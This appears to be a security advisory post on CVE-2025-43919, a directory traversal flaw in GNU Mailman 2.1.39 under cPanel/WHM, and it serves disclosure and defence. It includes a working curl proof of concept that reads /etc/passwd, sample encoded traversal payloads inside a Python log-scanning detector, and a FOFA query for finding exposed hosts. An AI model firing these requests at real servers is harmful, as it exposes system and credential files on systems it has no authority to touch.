## https://sploitus.com/exploit?id=730531E0-F350-5DB5-812A-7BDD4D3081D2
### CVE-2025-43919: Directory Traversal in GNU Mailman 2.1.39 (cPanel/WHM)
> A new vulnerability has been discovered in GNU Mailman 2.1.39, bundled with cPanel/WHM, allowing unauthenticated remote attackers to read arbitrary files on the server via a directory traversal flaw.
**Vulnerability Summary:**
- **Type**: `Directory Traversal` (Unauthenticated)
- **Component**: `private.py` CGI script
- **Affected Endpoint**: `/mailman/private/mailman`
- **Impact**: Disclosure of files such as `/etc/passwd`, `.mbox` list archives, and Mailman configuration files
- **CVSS Score**: `5.8 (Medium)`
- **CVE ID**: `CVE-2025-43919`
Status: No official patch (Mailman 2.1.x is EOL)
**Proof of Concept:**
```
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
```
**Exploitation Scenarios:**
- Dump `/etc/passwd`, configuration files, or mailbox files
- Leak credentials and sensitive archives
- Chain with other bugs for RCE or escalation
**Mitigations:**
Block access to `/mailman/private` at the web server level. Apache 2.4 syntax (the 2.2-era `Deny from all` must not be mixed with `Require`; on Apache 2.2 use `Order deny,allow` followed by `Deny from all` instead):
```
<Location "/mailman/private">
    Require all denied
</Location>
```
Or in Nginx:
```
location /mailman/private {
deny all;
return 403;
}
```
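Blocking the path stops the request; a defender also wants to know whether anyone tried. Because standard Apache/Nginx access logs do not record POST bodies, the `username` value has to come from a WAF or ModSecurity audit log, or from request-body logging in front of the CGI. The helper below is an added example (not part of the original post or of the Mailman project): it URL-decodes the `username` parameter, with a bounded second decode pass so double-encoded payloads are not missed, and flags any `..` path segment. The request bodies it scans are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample request bodies, as a WAF / ModSecurity audit log would
# capture them. Only the username field matters to the check; the rest is
# the normal Mailman private-archive login form.
SAMPLE_BODIES = [
    "username=listadmin&password=secret&submit=Let+me+in...",                 # benign login
    "username=../../../../etc/passwd&password=x&submit=Let+me+in...",         # plain traversal
    "username=..%2F..%2F..%2Fetc%2Fpasswd&password=x&submit=Let+me+in...",    # encoded slashes
    "username=%252e%252e%252f%252e%252e%252fetc%252fpasswd&password=x",      # double-encoded
    "username=archives/private/mylist.mbox/mylist.mbox&password=x",           # odd, but no '..'
]

# A '..' segment delimited by a slash (or string start/end) after normalization.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def normalize(value, max_rounds=3):
    """Percent-decode repeatedly, bounded to max_rounds, so that double
    encoding does not hide the payload; then fold backslashes to '/'."""
    prev = None
    for _ in range(max_rounds):
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value.replace("\\", "/")


def is_traversal(username):
    """True if the (normalized) username contains a '..' path segment."""
    return bool(TRAVERSAL_RE.search(normalize(username)))


def scan_body(body):
    """Return the decoded username if this form body looks like a traversal
    attempt against the private-archive login, otherwise None."""
    params = parse_qs(body, keep_blank_values=True)  # parse_qs decodes once
    for raw in params.get("username", []):
        if is_traversal(raw):
            return normalize(raw)
    return None


def scan_bodies(bodies):
    """Scan many captured bodies; return (index, decoded_username) hits."""
    hits = []
    for idx, body in enumerate(bodies):
        decoded = scan_body(body)
        if decoded is not None:
            hits.append((idx, decoded))
    return hits


if __name__ == "__main__":
    for idx, decoded in scan_bodies(SAMPLE_BODIES):
        print(f"body #{idx}: traversal in username -> {decoded!r}")
```

Feed `scan_bodies` the body field of each audit-log entry for `/mailman/private/`; a hit is worth an alert on its own, since a legitimate login never carries a path in `username`. The check is deliberately narrow (only `..` segments) so it stays quiet on ordinary logins; widen it if your logs show other shapes of abuse.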
Migrate to **Mailman 3.x**: 2.x is EOL and lacks modern protections.
FOFA Query: [app="Mailman"](https://en.fofa.info/result?qbase64=YXBwPSJNYWlsbWFuIg%3D%3D)
Learn more, share responsibly, and keep your infra secure.
Follow for more **real-world** CVEs, **PoCs**, and **hardening** tips:
[@cybersecplayground](https://t.me/cybersecplayground)
`#bugbounty` `#infosec` `#exploit` `#pentest` `#cve2025` `#directorytraversal` `#linuxsecurity`